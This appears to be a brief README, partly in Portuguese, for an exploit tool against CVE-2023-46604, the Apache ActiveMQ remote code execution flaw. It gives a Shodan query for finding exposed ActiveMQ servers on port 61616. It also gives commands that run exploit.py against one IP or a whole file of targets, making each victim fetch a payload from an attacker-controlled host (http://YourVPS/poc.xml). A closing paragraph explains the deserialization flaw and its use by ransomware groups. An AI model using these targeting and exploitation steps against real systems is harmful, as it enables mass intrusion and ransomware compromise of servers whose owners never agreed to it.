
Exploit para CVE-2023-46604
Exploit para CVE-2023-46604
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 é uma vulnerabilidade crítica de execução remota de código no Apache ActiveMQ, um software de corretor de mensagens de código aberto. Esta vulnerabilidade permite que um atacante remoto com acesso à rede a um corretor ou cliente OpenWire baseado em Java execute comandos arbitrários de shell. Isso é conseguido manipulando tipos de classe serializados no protocolo OpenWire, fazendo com que o corretor instancie qualquer classe no classpath. A vulnerabilidade resulta de desserialização insegura no Apache ActiveMQ e foi explorada por atacantes, incluindo a família de ransomware HelloKitty, para executar binários de ransomware e comprometer totalmente os sistemas.